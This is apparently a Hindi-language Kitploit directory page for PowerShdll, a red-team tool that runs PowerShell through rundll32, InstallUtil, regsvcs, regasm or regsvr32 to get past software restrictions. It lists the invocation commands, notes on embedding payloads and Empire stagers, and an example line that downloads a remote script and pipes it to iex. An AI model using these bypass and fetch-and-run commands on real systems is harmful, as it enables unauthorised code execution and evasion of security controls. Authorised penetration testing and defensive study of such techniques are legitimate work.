Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
PowerShdll — rundll32 के साथ PowerShell चलाएं। सॉफ्टवेयर प्रतिबंधों को बायपास करें। | Kitploit
उपकरण/GitHubGitHub/p3nt4/powershdll
रक्षात्मक उपकरणपेलोड जनरेशनकोड विश्लेषणआईडीएस/आईपीएस से बचनापेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubp3nt4/powershdll

PowerShdll

rundll32 के साथ PowerShell चलाएं। सॉफ्टवेयर प्रतिबंधों को बायपास करें।

रिपॉजिटरी देखें
1.8k2545 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

PowerShdll

केवल dlls के साथ PowerShell चलाएँ।

powershell.exe तक पहुँच की आवश्यकता नहीं है क्योंकि यह PowerShell ऑटोमेशन dlls का उपयोग करता है।

PowerShdll को इसके साथ चलाया जा सकता है: rundll32.exe, installutil.exe, regsvcs.exe, regasm.exe, regsvr32.exe या एक स्वतंत्र निष्पादन योग्य के रूप में।

dll मोड:

Rundll32:

root@kitploit:~
Usage:
rundll32 PowerShdll,main <script>
rundll32 PowerShdll,main -h      Display this message
rundll32 PowerShdll,main -f <path>       Run the script passed as argument
rundll32 PowerShdll,main -w      Start an interactive console in a new window (Default)
rundll32 PowerShdll,main -i      Start an interactive console in this console
If you do not have an interractive console, use -n to avoid crashes on output

विकल्प (इन तकनीकों के लिए SubTee को श्रेय):

root@kitploit:~
1. 
    x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShdll.dll
    x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.3031964\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShdll.dll
2. 
    x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe PowerShdll.dll
    x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe PowerShdll.dll
3. 
    x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U PowerShdll.dll
    x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U PowerShdll.dll
4. 
    regsvr32 /s  /u PowerShdll.dll -->Calls DllUnregisterServer
    regsvr32 /s PowerShdll.dll --> Calls DllRegisterServer

exe मोड

root@kitploit:~
Usage:
PowerShdll.exe <script>
PowerShdll.exe -h      Display this message
PowerShdll.exe -f <path>       Run the script passed as argument
PowerShdll.exe -i      Start an interactive console in this console (Default)

एम्बेडेड पेलोड

पेलोड को common.cs फ़ाइल के start मेथड में "payload" वेरिएबल को संशोधित करके एम्बेड किया जा सकता है। यदि कोई पेलोड एम्बेडेड है, तो अन्य सभी तर्कों को अनदेखा कर दिया जाएगा और PowerShdll चलाने पर पेलोड निष्पादित होगा।

उदाहरण

बेस64 एन्कोडेड स्क्रिप्ट चलाएँ

root@kitploit:~
rundll32 Powershdll.dll,main [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String("BASE64")) ^| iex

नोट: Empire स्टेजर्स को [System.Text.Encoding]::Unicode का उपयोग करके डिकोड करने की आवश्यकता है।

स्क्रिप्ट डाउनलोड करें और चलाएँ

root@kitploit:~
rundll32 PowerShdll.dll,main . { iwr -useb https://website.com/Script.ps1 } ^| iex;

आवश्यकताएँ

  • dll मोड के लिए .Net v3.5.
  • exe मोड के लिए .Net v2.0.

ज्ञात समस्याएँ

कुछ त्रुटियाँ आउटपुट में दिखाई नहीं देतीं। यह भ्रामक हो सकता है क्योंकि Import-Module जैसे कमांड विफल होने पर कोई त्रुटि आउटपुट नहीं करते। सुनिश्चित करें कि आपने अपने कमांड सही टाइप किए हैं।

dll मोड में, इंटरैक्टिव मोड और कमांड आउटपुट पैरेंट प्रक्रिया के कंसोल को हाईजैक करने पर निर्भर करते हैं। यदि पैरेंट प्रक्रिया में कंसोल नहीं है, तो आउटपुट न दिखाने के लिए -n स्विच का उपयोग करें अन्यथा एप्लिकेशन क्रैश हो जाएगा।

Rundll32 द्वारा तर्कों को संभालने के तरीके के कारण, स्विच और तर्कों के बीच कई स्पेस वर्णों का उपयोग करने से समस्याएँ हो सकती हैं। स्क्रिप्ट के अंदर कई स्पेस ठीक हैं।

अस्वीकरण

यह परियोजना सुरक्षा शोधकर्ताओं और पैनेट्रेशन टेस्टर्स के लिए है और इसे केवल सिस्टम स्वामियों की स्वीकृति के साथ ही उपयोग किया जाना चाहिए।

टूल डाउनलोड करें